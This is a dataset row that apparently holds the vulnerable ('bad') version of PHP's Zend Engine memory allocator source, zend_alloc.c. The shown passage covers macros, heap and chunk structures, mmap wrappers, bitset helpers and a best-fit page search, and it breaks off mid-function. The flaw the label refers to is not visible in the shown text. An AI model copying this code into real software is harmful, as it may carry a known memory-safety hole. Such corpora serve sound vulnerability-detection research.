id stringlengths 25 30 | content stringlengths 14 942k | max_stars_repo_path stringlengths 49 55 |
|---|---|---|
crossvul-cpp_data_bad_5262_0 | /*
+----------------------------------------------------------------------+
| Zend Engine |
+----------------------------------------------------------------------+
| Copyright (c) 1998-2016 Zend Technologies Ltd. (http://www.zend.com) |
+----------------------------------------------------------------------+
| This source file is subject to version 2.00 of the Zend license, |
| that is bundled with this package in the file LICENSE, and is |
| available through the world-wide-web at the following url: |
| http://www.zend.com/license/2_00.txt. |
| If you did not receive a copy of the Zend license and are unable to |
| obtain it through the world-wide-web, please send a note to |
| license@zend.com so we can mail you a copy immediately. |
+----------------------------------------------------------------------+
| Authors: Andi Gutmans <andi@zend.com> |
| Zeev Suraski <zeev@zend.com> |
| Dmitry Stogov <dmitry@zend.com> |
+----------------------------------------------------------------------+
*/
/* $Id$ */
/*
* zend_alloc is designed to be a modern CPU cache friendly memory manager
* for PHP. Most ideas are taken from jemalloc and tcmalloc implementations.
*
* All allocations are split into 3 categories:
*
* Huge - the size is greater than CHUNK size (~2M by default), allocation is
* performed using mmap(). The result is aligned on 2M boundary.
*
* Large - a number of 4096K pages inside a CHUNK. Large blocks
* are always aligned on page boundary.
*
* Small - less than 3/4 of page size. Small sizes are rounded up to nearest
* greater predefined small size (there are 30 predefined sizes:
* 8, 16, 24, 32, ... 3072). Small blocks are allocated from
* RUNs. Each RUN is allocated as a single or few following pages.
* Allocation inside RUNs implemented using linked list of free
* elements. The result is aligned to 8 bytes.
*
* zend_alloc allocates memory from OS by CHUNKs, these CHUNKs and huge memory
* blocks are always aligned to CHUNK boundary. So it's very easy to determine
* the CHUNK owning the certain pointer. Regular CHUNKs reserve a single
* page at start for special purpose. It contains bitset of free pages,
* few bitset for available runs of predefined small sizes, map of pages that
* keeps information about usage of each page in this CHUNK, etc.
*
* zend_alloc provides familiar emalloc/efree/erealloc API, but in addition it
* provides specialized and optimized routines to allocate blocks of predefined
* sizes (e.g. emalloc_2(), emallc_4(), ..., emalloc_large(), etc)
* The library uses C preprocessor tricks that substitute calls to emalloc()
* with more specialized routines when the requested size is known.
*/
#include "zend.h"
#include "zend_alloc.h"
#include "zend_globals.h"
#include "zend_operators.h"
#include "zend_multiply.h"
#ifdef HAVE_SIGNAL_H
# include <signal.h>
#endif
#ifdef HAVE_UNISTD_H
# include <unistd.h>
#endif
#ifdef ZEND_WIN32
# include <wincrypt.h>
# include <process.h>
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#if HAVE_LIMITS_H
#include <limits.h>
#endif
#include <fcntl.h>
#include <errno.h>
#ifndef _WIN32
# ifdef HAVE_MREMAP
# ifndef _GNU_SOURCE
# define _GNU_SOURCE
# endif
# ifndef __USE_GNU
# define __USE_GNU
# endif
# endif
# include <sys/mman.h>
# ifndef MAP_ANON
# ifdef MAP_ANONYMOUS
# define MAP_ANON MAP_ANONYMOUS
# endif
# endif
# ifndef MREMAP_MAYMOVE
# define MREMAP_MAYMOVE 0
# endif
# ifndef MAP_FAILED
# define MAP_FAILED ((void*)-1)
# endif
# ifndef MAP_POPULATE
# define MAP_POPULATE 0
# endif
# if defined(_SC_PAGESIZE) || (_SC_PAGE_SIZE)
# define REAL_PAGE_SIZE _real_page_size
static size_t _real_page_size = ZEND_MM_PAGE_SIZE;
# endif
#endif
#ifndef REAL_PAGE_SIZE
# define REAL_PAGE_SIZE ZEND_MM_PAGE_SIZE
#endif
#ifndef ZEND_MM_STAT
# define ZEND_MM_STAT 1 /* track current and peak memory usage */
#endif
#ifndef ZEND_MM_LIMIT
# define ZEND_MM_LIMIT 1 /* support for user-defined memory limit */
#endif
#ifndef ZEND_MM_CUSTOM
# define ZEND_MM_CUSTOM 1 /* support for custom memory allocator */
/* USE_ZEND_ALLOC=0 may switch to system malloc() */
#endif
#ifndef ZEND_MM_STORAGE
# define ZEND_MM_STORAGE 1 /* support for custom memory storage */
#endif
#ifndef ZEND_MM_ERROR
# define ZEND_MM_ERROR 1 /* report system errors */
#endif
#ifndef ZEND_MM_CHECK
# define ZEND_MM_CHECK(condition, message) do { \
if (UNEXPECTED(!(condition))) { \
zend_mm_panic(message); \
} \
} while (0)
#endif
typedef uint32_t zend_mm_page_info; /* 4-byte integer */
typedef zend_ulong zend_mm_bitset; /* 4-byte or 8-byte integer */
#define ZEND_MM_ALIGNED_OFFSET(size, alignment) \
(((size_t)(size)) & ((alignment) - 1))
#define ZEND_MM_ALIGNED_BASE(size, alignment) \
(((size_t)(size)) & ~((alignment) - 1))
#define ZEND_MM_SIZE_TO_NUM(size, alignment) \
(((size_t)(size) + ((alignment) - 1)) / (alignment))
#define ZEND_MM_BITSET_LEN (sizeof(zend_mm_bitset) * 8) /* 32 or 64 */
#define ZEND_MM_PAGE_MAP_LEN (ZEND_MM_PAGES / ZEND_MM_BITSET_LEN) /* 16 or 8 */
typedef zend_mm_bitset zend_mm_page_map[ZEND_MM_PAGE_MAP_LEN]; /* 64B */
#define ZEND_MM_IS_FRUN 0x00000000
#define ZEND_MM_IS_LRUN 0x40000000
#define ZEND_MM_IS_SRUN 0x80000000
#define ZEND_MM_LRUN_PAGES_MASK 0x000003ff
#define ZEND_MM_LRUN_PAGES_OFFSET 0
#define ZEND_MM_SRUN_BIN_NUM_MASK 0x0000001f
#define ZEND_MM_SRUN_BIN_NUM_OFFSET 0
#define ZEND_MM_SRUN_FREE_COUNTER_MASK 0x01ff0000
#define ZEND_MM_SRUN_FREE_COUNTER_OFFSET 16
#define ZEND_MM_NRUN_OFFSET_MASK 0x01ff0000
#define ZEND_MM_NRUN_OFFSET_OFFSET 16
#define ZEND_MM_LRUN_PAGES(info) (((info) & ZEND_MM_LRUN_PAGES_MASK) >> ZEND_MM_LRUN_PAGES_OFFSET)
#define ZEND_MM_SRUN_BIN_NUM(info) (((info) & ZEND_MM_SRUN_BIN_NUM_MASK) >> ZEND_MM_SRUN_BIN_NUM_OFFSET)
#define ZEND_MM_SRUN_FREE_COUNTER(info) (((info) & ZEND_MM_SRUN_FREE_COUNTER_MASK) >> ZEND_MM_SRUN_FREE_COUNTER_OFFSET)
#define ZEND_MM_NRUN_OFFSET(info) (((info) & ZEND_MM_NRUN_OFFSET_MASK) >> ZEND_MM_NRUN_OFFSET_OFFSET)
#define ZEND_MM_FRUN() ZEND_MM_IS_FRUN
#define ZEND_MM_LRUN(count) (ZEND_MM_IS_LRUN | ((count) << ZEND_MM_LRUN_PAGES_OFFSET))
#define ZEND_MM_SRUN(bin_num) (ZEND_MM_IS_SRUN | ((bin_num) << ZEND_MM_SRUN_BIN_NUM_OFFSET))
#define ZEND_MM_SRUN_EX(bin_num, count) (ZEND_MM_IS_SRUN | ((bin_num) << ZEND_MM_SRUN_BIN_NUM_OFFSET) | ((count) << ZEND_MM_SRUN_FREE_COUNTER_OFFSET))
#define ZEND_MM_NRUN(bin_num, offset) (ZEND_MM_IS_SRUN | ZEND_MM_IS_LRUN | ((bin_num) << ZEND_MM_SRUN_BIN_NUM_OFFSET) | ((offset) << ZEND_MM_NRUN_OFFSET_OFFSET))
#define ZEND_MM_BINS 30
typedef struct _zend_mm_page zend_mm_page;
typedef struct _zend_mm_bin zend_mm_bin;
typedef struct _zend_mm_free_slot zend_mm_free_slot;
typedef struct _zend_mm_chunk zend_mm_chunk;
typedef struct _zend_mm_huge_list zend_mm_huge_list;
#ifdef _WIN64
# define PTR_FMT "0x%0.16I64x"
#elif SIZEOF_LONG == 8
# define PTR_FMT "0x%0.16lx"
#else
# define PTR_FMT "0x%0.8lx"
#endif
#ifdef MAP_HUGETLB
int zend_mm_use_huge_pages = 0;
#endif
/*
* Memory is retrived from OS by chunks of fixed size 2MB.
* Inside chunk it's managed by pages of fixed size 4096B.
* So each chunk consists from 512 pages.
* The first page of each chunk is reseved for chunk header.
* It contains service information about all pages.
*
* free_pages - current number of free pages in this chunk
*
* free_tail - number of continuous free pages at the end of chunk
*
* free_map - bitset (a bit for each page). The bit is set if the corresponding
* page is allocated. Allocator for "lage sizes" may easily find a
* free page (or a continuous number of pages) searching for zero
* bits.
*
* map - contains service information for each page. (32-bits for each
* page).
* usage:
* (2 bits)
* FRUN - free page,
* LRUN - first page of "large" allocation
* SRUN - first page of a bin used for "small" allocation
*
* lrun_pages:
* (10 bits) number of allocated pages
*
* srun_bin_num:
* (5 bits) bin number (e.g. 0 for sizes 0-2, 1 for 3-4,
* 2 for 5-8, 3 for 9-16 etc) see zend_alloc_sizes.h
*/
struct _zend_mm_heap {
#if ZEND_MM_CUSTOM
int use_custom_heap;
#endif
#if ZEND_MM_STORAGE
zend_mm_storage *storage;
#endif
#if ZEND_MM_STAT
size_t size; /* current memory usage */
size_t peak; /* peak memory usage */
#endif
zend_mm_free_slot *free_slot[ZEND_MM_BINS]; /* free lists for small sizes */
#if ZEND_MM_STAT || ZEND_MM_LIMIT
size_t real_size; /* current size of allocated pages */
#endif
#if ZEND_MM_STAT
size_t real_peak; /* peak size of allocated pages */
#endif
#if ZEND_MM_LIMIT
size_t limit; /* memory limit */
int overflow; /* memory overflow flag */
#endif
zend_mm_huge_list *huge_list; /* list of huge allocated blocks */
zend_mm_chunk *main_chunk;
zend_mm_chunk *cached_chunks; /* list of unused chunks */
int chunks_count; /* number of alocated chunks */
int peak_chunks_count; /* peak number of allocated chunks for current request */
int cached_chunks_count; /* number of cached chunks */
double avg_chunks_count; /* average number of chunks allocated per request */
#if ZEND_MM_CUSTOM
union {
struct {
void *(*_malloc)(size_t);
void (*_free)(void*);
void *(*_realloc)(void*, size_t);
} std;
struct {
void *(*_malloc)(size_t ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC);
void (*_free)(void* ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC);
void *(*_realloc)(void*, size_t ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC);
} debug;
} custom_heap;
#endif
};
struct _zend_mm_chunk {
zend_mm_heap *heap;
zend_mm_chunk *next;
zend_mm_chunk *prev;
int free_pages; /* number of free pages */
int free_tail; /* number of free pages at the end of chunk */
int num;
char reserve[64 - (sizeof(void*) * 3 + sizeof(int) * 3)];
zend_mm_heap heap_slot; /* used only in main chunk */
zend_mm_page_map free_map; /* 512 bits or 64 bytes */
zend_mm_page_info map[ZEND_MM_PAGES]; /* 2 KB = 512 * 4 */
};
struct _zend_mm_page {
char bytes[ZEND_MM_PAGE_SIZE];
};
/*
* bin - is one or few continuous pages (up to 8) used for allocation of
* a particular "small size".
*/
struct _zend_mm_bin {
char bytes[ZEND_MM_PAGE_SIZE * 8];
};
struct _zend_mm_free_slot {
zend_mm_free_slot *next_free_slot;
};
struct _zend_mm_huge_list {
void *ptr;
size_t size;
zend_mm_huge_list *next;
#if ZEND_DEBUG
zend_mm_debug_info dbg;
#endif
};
#define ZEND_MM_PAGE_ADDR(chunk, page_num) \
((void*)(((zend_mm_page*)(chunk)) + (page_num)))
#define _BIN_DATA_SIZE(num, size, elements, pages, x, y) size,
static const unsigned int bin_data_size[] = {
ZEND_MM_BINS_INFO(_BIN_DATA_SIZE, x, y)
};
#define _BIN_DATA_ELEMENTS(num, size, elements, pages, x, y) elements,
static const int bin_elements[] = {
ZEND_MM_BINS_INFO(_BIN_DATA_ELEMENTS, x, y)
};
#define _BIN_DATA_PAGES(num, size, elements, pages, x, y) pages,
static const int bin_pages[] = {
ZEND_MM_BINS_INFO(_BIN_DATA_PAGES, x, y)
};
#if ZEND_DEBUG
ZEND_COLD void zend_debug_alloc_output(char *format, ...)
{
char output_buf[256];
va_list args;
va_start(args, format);
vsprintf(output_buf, format, args);
va_end(args);
#ifdef ZEND_WIN32
OutputDebugString(output_buf);
#else
fprintf(stderr, "%s", output_buf);
#endif
}
#endif
static ZEND_COLD ZEND_NORETURN void zend_mm_panic(const char *message)
{
fprintf(stderr, "%s\n", message);
/* See http://support.microsoft.com/kb/190351 */
#ifdef ZEND_WIN32
fflush(stderr);
#endif
#if ZEND_DEBUG && defined(HAVE_KILL) && defined(HAVE_GETPID)
kill(getpid(), SIGSEGV);
#endif
exit(1);
}
static ZEND_COLD ZEND_NORETURN void zend_mm_safe_error(zend_mm_heap *heap,
const char *format,
size_t limit,
#if ZEND_DEBUG
const char *filename,
uint lineno,
#endif
size_t size)
{
heap->overflow = 1;
zend_try {
zend_error_noreturn(E_ERROR,
format,
limit,
#if ZEND_DEBUG
filename,
lineno,
#endif
size);
} zend_catch {
} zend_end_try();
heap->overflow = 0;
zend_bailout();
exit(1);
}
#ifdef _WIN32
void
stderr_last_error(char *msg)
{
LPSTR buf = NULL;
DWORD err = GetLastError();
if (!FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_FROM_SYSTEM |
FORMAT_MESSAGE_IGNORE_INSERTS,
NULL,
err,
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPSTR)&buf,
0, NULL)) {
fprintf(stderr, "\n%s: [0x%08lx]\n", msg, err);
}
else {
fprintf(stderr, "\n%s: [0x%08lx] %s\n", msg, err, buf);
}
}
#endif
/*****************/
/* OS Allocation */
/*****************/
static void *zend_mm_mmap_fixed(void *addr, size_t size)
{
#ifdef _WIN32
return VirtualAlloc(addr, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
#else
/* MAP_FIXED leads to discarding of the old mapping, so it can't be used. */
void *ptr = mmap(addr, size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON /*| MAP_POPULATE | MAP_HUGETLB*/, -1, 0);
if (ptr == MAP_FAILED) {
#if ZEND_MM_ERROR
fprintf(stderr, "\nmmap() failed: [%d] %s\n", errno, strerror(errno));
#endif
return NULL;
} else if (ptr != addr) {
if (munmap(ptr, size) != 0) {
#if ZEND_MM_ERROR
fprintf(stderr, "\nmunmap() failed: [%d] %s\n", errno, strerror(errno));
#endif
}
return NULL;
}
return ptr;
#endif
}
static void *zend_mm_mmap(size_t size)
{
#ifdef _WIN32
void *ptr = VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (ptr == NULL) {
#if ZEND_MM_ERROR
stderr_last_error("VirtualAlloc() failed");
#endif
return NULL;
}
return ptr;
#else
void *ptr;
#ifdef MAP_HUGETLB
if (zend_mm_use_huge_pages && size == ZEND_MM_CHUNK_SIZE) {
ptr = mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON | MAP_HUGETLB, -1, 0);
if (ptr != MAP_FAILED) {
return ptr;
}
}
#endif
ptr = mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, -1, 0);
if (ptr == MAP_FAILED) {
#if ZEND_MM_ERROR
fprintf(stderr, "\nmmap() failed: [%d] %s\n", errno, strerror(errno));
#endif
return NULL;
}
return ptr;
#endif
}
static void zend_mm_munmap(void *addr, size_t size)
{
#ifdef _WIN32
if (VirtualFree(addr, 0, MEM_RELEASE) == 0) {
#if ZEND_MM_ERROR
stderr_last_error("VirtualFree() failed");
#endif
}
#else
if (munmap(addr, size) != 0) {
#if ZEND_MM_ERROR
fprintf(stderr, "\nmunmap() failed: [%d] %s\n", errno, strerror(errno));
#endif
}
#endif
}
/***********/
/* Bitmask */
/***********/
/* number of trailing set (1) bits */
static zend_always_inline int zend_mm_bitset_nts(zend_mm_bitset bitset)
{
#if (defined(__GNUC__) || __has_builtin(__builtin_ctzl)) && SIZEOF_ZEND_LONG == SIZEOF_LONG && defined(PHP_HAVE_BUILTIN_CTZL)
return __builtin_ctzl(~bitset);
#elif (defined(__GNUC__) || __has_builtin(__builtin_ctzll)) && defined(PHP_HAVE_BUILTIN_CTZLL)
return __builtin_ctzll(~bitset);
#elif defined(_WIN32)
unsigned long index;
#if defined(_WIN64)
if (!BitScanForward64(&index, ~bitset)) {
#else
if (!BitScanForward(&index, ~bitset)) {
#endif
/* undefined behavior */
return 32;
}
return (int)index;
#else
int n;
if (bitset == (zend_mm_bitset)-1) return ZEND_MM_BITSET_LEN;
n = 0;
#if SIZEOF_ZEND_LONG == 8
if (sizeof(zend_mm_bitset) == 8) {
if ((bitset & 0xffffffff) == 0xffffffff) {n += 32; bitset = bitset >> Z_UL(32);}
}
#endif
if ((bitset & 0x0000ffff) == 0x0000ffff) {n += 16; bitset = bitset >> 16;}
if ((bitset & 0x000000ff) == 0x000000ff) {n += 8; bitset = bitset >> 8;}
if ((bitset & 0x0000000f) == 0x0000000f) {n += 4; bitset = bitset >> 4;}
if ((bitset & 0x00000003) == 0x00000003) {n += 2; bitset = bitset >> 2;}
return n + (bitset & 1);
#endif
}
/* number of trailing zero bits (0x01 -> 1; 0x40 -> 6; 0x00 -> LEN) */
static zend_always_inline int zend_mm_bitset_ntz(zend_mm_bitset bitset)
{
#if (defined(__GNUC__) || __has_builtin(__builtin_ctzl)) && SIZEOF_ZEND_LONG == SIZEOF_LONG && defined(PHP_HAVE_BUILTIN_CTZL)
return __builtin_ctzl(bitset);
#elif (defined(__GNUC__) || __has_builtin(__builtin_ctzll)) && defined(PHP_HAVE_BUILTIN_CTZLL)
return __builtin_ctzll(bitset);
#elif defined(_WIN32)
unsigned long index;
#if defined(_WIN64)
if (!BitScanForward64(&index, bitset)) {
#else
if (!BitScanForward(&index, bitset)) {
#endif
/* undefined behavior */
return 32;
}
return (int)index;
#else
int n;
if (bitset == (zend_mm_bitset)0) return ZEND_MM_BITSET_LEN;
n = 1;
#if SIZEOF_ZEND_LONG == 8
if (sizeof(zend_mm_bitset) == 8) {
if ((bitset & 0xffffffff) == 0) {n += 32; bitset = bitset >> Z_UL(32);}
}
#endif
if ((bitset & 0x0000ffff) == 0) {n += 16; bitset = bitset >> 16;}
if ((bitset & 0x000000ff) == 0) {n += 8; bitset = bitset >> 8;}
if ((bitset & 0x0000000f) == 0) {n += 4; bitset = bitset >> 4;}
if ((bitset & 0x00000003) == 0) {n += 2; bitset = bitset >> 2;}
return n - (bitset & 1);
#endif
}
static zend_always_inline int zend_mm_bitset_find_zero(zend_mm_bitset *bitset, int size)
{
int i = 0;
do {
zend_mm_bitset tmp = bitset[i];
if (tmp != (zend_mm_bitset)-1) {
return i * ZEND_MM_BITSET_LEN + zend_mm_bitset_nts(tmp);
}
i++;
} while (i < size);
return -1;
}
static zend_always_inline int zend_mm_bitset_find_one(zend_mm_bitset *bitset, int size)
{
int i = 0;
do {
zend_mm_bitset tmp = bitset[i];
if (tmp != 0) {
return i * ZEND_MM_BITSET_LEN + zend_mm_bitset_ntz(tmp);
}
i++;
} while (i < size);
return -1;
}
static zend_always_inline int zend_mm_bitset_find_zero_and_set(zend_mm_bitset *bitset, int size)
{
int i = 0;
do {
zend_mm_bitset tmp = bitset[i];
if (tmp != (zend_mm_bitset)-1) {
int n = zend_mm_bitset_nts(tmp);
bitset[i] |= Z_UL(1) << n;
return i * ZEND_MM_BITSET_LEN + n;
}
i++;
} while (i < size);
return -1;
}
static zend_always_inline int zend_mm_bitset_is_set(zend_mm_bitset *bitset, int bit)
{
return (bitset[bit / ZEND_MM_BITSET_LEN] & (Z_L(1) << (bit & (ZEND_MM_BITSET_LEN-1)))) != 0;
}
static zend_always_inline void zend_mm_bitset_set_bit(zend_mm_bitset *bitset, int bit)
{
bitset[bit / ZEND_MM_BITSET_LEN] |= (Z_L(1) << (bit & (ZEND_MM_BITSET_LEN-1)));
}
static zend_always_inline void zend_mm_bitset_reset_bit(zend_mm_bitset *bitset, int bit)
{
bitset[bit / ZEND_MM_BITSET_LEN] &= ~(Z_L(1) << (bit & (ZEND_MM_BITSET_LEN-1)));
}
static zend_always_inline void zend_mm_bitset_set_range(zend_mm_bitset *bitset, int start, int len)
{
if (len == 1) {
zend_mm_bitset_set_bit(bitset, start);
} else {
int pos = start / ZEND_MM_BITSET_LEN;
int end = (start + len - 1) / ZEND_MM_BITSET_LEN;
int bit = start & (ZEND_MM_BITSET_LEN - 1);
zend_mm_bitset tmp;
if (pos != end) {
/* set bits from "bit" to ZEND_MM_BITSET_LEN-1 */
tmp = (zend_mm_bitset)-1 << bit;
bitset[pos++] |= tmp;
while (pos != end) {
/* set all bits */
bitset[pos++] = (zend_mm_bitset)-1;
}
end = (start + len - 1) & (ZEND_MM_BITSET_LEN - 1);
/* set bits from "0" to "end" */
tmp = (zend_mm_bitset)-1 >> ((ZEND_MM_BITSET_LEN - 1) - end);
bitset[pos] |= tmp;
} else {
end = (start + len - 1) & (ZEND_MM_BITSET_LEN - 1);
/* set bits from "bit" to "end" */
tmp = (zend_mm_bitset)-1 << bit;
tmp &= (zend_mm_bitset)-1 >> ((ZEND_MM_BITSET_LEN - 1) - end);
bitset[pos] |= tmp;
}
}
}
static zend_always_inline void zend_mm_bitset_reset_range(zend_mm_bitset *bitset, int start, int len)
{
if (len == 1) {
zend_mm_bitset_reset_bit(bitset, start);
} else {
int pos = start / ZEND_MM_BITSET_LEN;
int end = (start + len - 1) / ZEND_MM_BITSET_LEN;
int bit = start & (ZEND_MM_BITSET_LEN - 1);
zend_mm_bitset tmp;
if (pos != end) {
/* reset bits from "bit" to ZEND_MM_BITSET_LEN-1 */
tmp = ~((Z_L(1) << bit) - 1);
bitset[pos++] &= ~tmp;
while (pos != end) {
/* set all bits */
bitset[pos++] = 0;
}
end = (start + len - 1) & (ZEND_MM_BITSET_LEN - 1);
/* reset bits from "0" to "end" */
tmp = (zend_mm_bitset)-1 >> ((ZEND_MM_BITSET_LEN - 1) - end);
bitset[pos] &= ~tmp;
} else {
end = (start + len - 1) & (ZEND_MM_BITSET_LEN - 1);
/* reset bits from "bit" to "end" */
tmp = (zend_mm_bitset)-1 << bit;
tmp &= (zend_mm_bitset)-1 >> ((ZEND_MM_BITSET_LEN - 1) - end);
bitset[pos] &= ~tmp;
}
}
}
static zend_always_inline int zend_mm_bitset_is_free_range(zend_mm_bitset *bitset, int start, int len)
{
if (len == 1) {
return !zend_mm_bitset_is_set(bitset, start);
} else {
int pos = start / ZEND_MM_BITSET_LEN;
int end = (start + len - 1) / ZEND_MM_BITSET_LEN;
int bit = start & (ZEND_MM_BITSET_LEN - 1);
zend_mm_bitset tmp;
if (pos != end) {
/* set bits from "bit" to ZEND_MM_BITSET_LEN-1 */
tmp = (zend_mm_bitset)-1 << bit;
if ((bitset[pos++] & tmp) != 0) {
return 0;
}
while (pos != end) {
/* set all bits */
if (bitset[pos++] != 0) {
return 0;
}
}
end = (start + len - 1) & (ZEND_MM_BITSET_LEN - 1);
/* set bits from "0" to "end" */
tmp = (zend_mm_bitset)-1 >> ((ZEND_MM_BITSET_LEN - 1) - end);
return (bitset[pos] & tmp) == 0;
} else {
end = (start + len - 1) & (ZEND_MM_BITSET_LEN - 1);
/* set bits from "bit" to "end" */
tmp = (zend_mm_bitset)-1 << bit;
tmp &= (zend_mm_bitset)-1 >> ((ZEND_MM_BITSET_LEN - 1) - end);
return (bitset[pos] & tmp) == 0;
}
}
}
/**********/
/* Chunks */
/**********/
static void *zend_mm_chunk_alloc_int(size_t size, size_t alignment)
{
void *ptr = zend_mm_mmap(size);
if (ptr == NULL) {
return NULL;
} else if (ZEND_MM_ALIGNED_OFFSET(ptr, alignment) == 0) {
#ifdef MADV_HUGEPAGE
madvise(ptr, size, MADV_HUGEPAGE);
#endif
return ptr;
} else {
size_t offset;
/* chunk has to be aligned */
zend_mm_munmap(ptr, size);
ptr = zend_mm_mmap(size + alignment - REAL_PAGE_SIZE);
#ifdef _WIN32
offset = ZEND_MM_ALIGNED_OFFSET(ptr, alignment);
zend_mm_munmap(ptr, size + alignment - REAL_PAGE_SIZE);
ptr = zend_mm_mmap_fixed((void*)((char*)ptr + (alignment - offset)), size);
offset = ZEND_MM_ALIGNED_OFFSET(ptr, alignment);
if (offset != 0) {
zend_mm_munmap(ptr, size);
return NULL;
}
return ptr;
#else
offset = ZEND_MM_ALIGNED_OFFSET(ptr, alignment);
if (offset != 0) {
offset = alignment - offset;
zend_mm_munmap(ptr, offset);
ptr = (char*)ptr + offset;
alignment -= offset;
}
if (alignment > REAL_PAGE_SIZE) {
zend_mm_munmap((char*)ptr + size, alignment - REAL_PAGE_SIZE);
}
# ifdef MADV_HUGEPAGE
madvise(ptr, size, MADV_HUGEPAGE);
# endif
#endif
return ptr;
}
}
static void *zend_mm_chunk_alloc(zend_mm_heap *heap, size_t size, size_t alignment)
{
#if ZEND_MM_STORAGE
if (UNEXPECTED(heap->storage)) {
void *ptr = heap->storage->handlers.chunk_alloc(heap->storage, size, alignment);
ZEND_ASSERT(((zend_uintptr_t)((char*)ptr + (alignment-1)) & (alignment-1)) == (zend_uintptr_t)ptr);
return ptr;
}
#endif
return zend_mm_chunk_alloc_int(size, alignment);
}
static void zend_mm_chunk_free(zend_mm_heap *heap, void *addr, size_t size)
{
#if ZEND_MM_STORAGE
if (UNEXPECTED(heap->storage)) {
heap->storage->handlers.chunk_free(heap->storage, addr, size);
return;
}
#endif
zend_mm_munmap(addr, size);
}
static int zend_mm_chunk_truncate(zend_mm_heap *heap, void *addr, size_t old_size, size_t new_size)
{
#if ZEND_MM_STORAGE
if (UNEXPECTED(heap->storage)) {
if (heap->storage->handlers.chunk_truncate) {
return heap->storage->handlers.chunk_truncate(heap->storage, addr, old_size, new_size);
} else {
return 0;
}
}
#endif
#ifndef _WIN32
zend_mm_munmap((char*)addr + new_size, old_size - new_size);
return 1;
#else
return 0;
#endif
}
static int zend_mm_chunk_extend(zend_mm_heap *heap, void *addr, size_t old_size, size_t new_size)
{
#if ZEND_MM_STORAGE
if (UNEXPECTED(heap->storage)) {
if (heap->storage->handlers.chunk_extend) {
return heap->storage->handlers.chunk_extend(heap->storage, addr, old_size, new_size);
} else {
return 0;
}
}
#endif
#ifndef _WIN32
return (zend_mm_mmap_fixed((char*)addr + old_size, new_size - old_size) != NULL);
#else
return 0;
#endif
}
static zend_always_inline void zend_mm_chunk_init(zend_mm_heap *heap, zend_mm_chunk *chunk)
{
chunk->heap = heap;
chunk->next = heap->main_chunk;
chunk->prev = heap->main_chunk->prev;
chunk->prev->next = chunk;
chunk->next->prev = chunk;
/* mark first pages as allocated */
chunk->free_pages = ZEND_MM_PAGES - ZEND_MM_FIRST_PAGE;
chunk->free_tail = ZEND_MM_FIRST_PAGE;
/* the younger chunks have bigger number */
chunk->num = chunk->prev->num + 1;
/* mark first pages as allocated */
chunk->free_map[0] = (1L << ZEND_MM_FIRST_PAGE) - 1;
chunk->map[0] = ZEND_MM_LRUN(ZEND_MM_FIRST_PAGE);
}
/***********************/
/* Huge Runs (forward) */
/***********************/
static size_t zend_mm_get_huge_block_size(zend_mm_heap *heap, void *ptr ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC);
static void *zend_mm_alloc_huge(zend_mm_heap *heap, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC);
static void zend_mm_free_huge(zend_mm_heap *heap, void *ptr ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC);
#if ZEND_DEBUG
static void zend_mm_change_huge_block_size(zend_mm_heap *heap, void *ptr, size_t size, size_t dbg_size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC);
#else
static void zend_mm_change_huge_block_size(zend_mm_heap *heap, void *ptr, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC);
#endif
/**************/
/* Large Runs */
/**************/
#if ZEND_DEBUG
static void *zend_mm_alloc_pages(zend_mm_heap *heap, int pages_count, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
#else
static void *zend_mm_alloc_pages(zend_mm_heap *heap, int pages_count ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
#endif
{
zend_mm_chunk *chunk = heap->main_chunk;
int page_num, len;
while (1) {
if (UNEXPECTED(chunk->free_pages < pages_count)) {
goto not_found;
#if 0
} else if (UNEXPECTED(chunk->free_pages + chunk->free_tail == ZEND_MM_PAGES)) {
if (UNEXPECTED(ZEND_MM_PAGES - chunk->free_tail < pages_count)) {
goto not_found;
} else {
page_num = chunk->free_tail;
goto found;
}
} else if (0) {
/* First-Fit Search */
int free_tail = chunk->free_tail;
zend_mm_bitset *bitset = chunk->free_map;
zend_mm_bitset tmp = *(bitset++);
int i = 0;
while (1) {
/* skip allocated blocks */
while (tmp == (zend_mm_bitset)-1) {
i += ZEND_MM_BITSET_LEN;
if (i == ZEND_MM_PAGES) {
goto not_found;
}
tmp = *(bitset++);
}
/* find first 0 bit */
page_num = i + zend_mm_bitset_nts(tmp);
/* reset bits from 0 to "bit" */
tmp &= tmp + 1;
/* skip free blocks */
while (tmp == 0) {
i += ZEND_MM_BITSET_LEN;
len = i - page_num;
if (len >= pages_count) {
goto found;
} else if (i >= free_tail) {
goto not_found;
}
tmp = *(bitset++);
}
/* find first 1 bit */
len = (i + zend_mm_bitset_ntz(tmp)) - page_num;
if (len >= pages_count) {
goto found;
}
/* set bits from 0 to "bit" */
tmp |= tmp - 1;
}
#endif
} else {
/* Best-Fit Search */
int best = -1;
int best_len = ZEND_MM_PAGES;
int free_tail = chunk->free_tail;
zend_mm_bitset *bitset = chunk->free_map;
zend_mm_bitset tmp = *(bitset++);
int i = 0;
while (1) {
/* skip allocated blocks */
while (tmp == (zend_mm_bitset)-1) {
i += ZEND_MM_BITSET_LEN;
if (i == ZEND_MM_PAGES) {
if (best > 0) {
page_num = best;
goto found;
} else {
goto not_found;
}
}
tmp = *(bitset++);
}
/* find first 0 bit */
page_num = i + zend_mm_bitset_nts(tmp);
/* reset bits from 0 to "bit" */
tmp &= tmp + 1;
/* skip free blocks */
while (tmp == 0) {
i += ZEND_MM_BITSET_LEN;
